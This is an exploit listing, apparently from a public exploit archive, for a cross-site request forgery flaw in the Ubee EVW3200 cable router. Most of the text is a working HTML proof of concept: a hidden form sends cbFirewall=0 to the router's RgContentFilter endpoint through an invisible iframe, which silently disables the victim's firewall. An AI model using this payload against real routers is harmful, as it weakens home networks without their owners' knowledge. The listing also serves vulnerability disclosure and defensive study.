63 lines
No EOL
974 B
Text
63 lines
No EOL
974 B
Text
# Exploit Title: Ubee EVW3200 - Multiple Cross Site Request Forgery
|
|
|
|
# Google Dork: N/A
|
|
|
|
# Date: 02-03-2014
|
|
|
|
# Exploit Author: Jeroen - IT Nerdbox
|
|
|
|
# Vendor Homepage: http://www.ubeeinteractive.com/
|
|
|
|
# Software Link:
|
|
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20
|
|
|
|
# Version: All
|
|
|
|
# Tested on: N/A
|
|
|
|
# CVE : N/A
|
|
|
|
#
|
|
|
|
## Description:
|
|
|
|
#
|
|
|
|
# The Ubee ECV3200 does not use Anti CSRF tokens in any of its forms.
|
|
|
|
#
|
|
|
|
## PoC:
|
|
|
|
#
|
|
|
|
# <form name="reseller" method="POST"
|
|
action="http://192.168.178.1/goform/RgContentFilter" id="csrf_attack"
|
|
target="csrf_iframe">
|
|
|
|
# <input type="hidden" name="cbFirewall" value="0">
|
|
|
|
# </form>
|
|
|
|
#
|
|
|
|
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
|
|
|
|
#
|
|
|
|
# <script>
|
|
|
|
# document.getElementById('csrf_attack').submit();
|
|
|
|
# </script>
|
|
|
|
# <center>The payload has been executed....</center>
|
|
|
|
#</html>
|
|
|
|
#
|
|
|
|
#
|
|
|
|
# More information can be found at:
|
|
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ |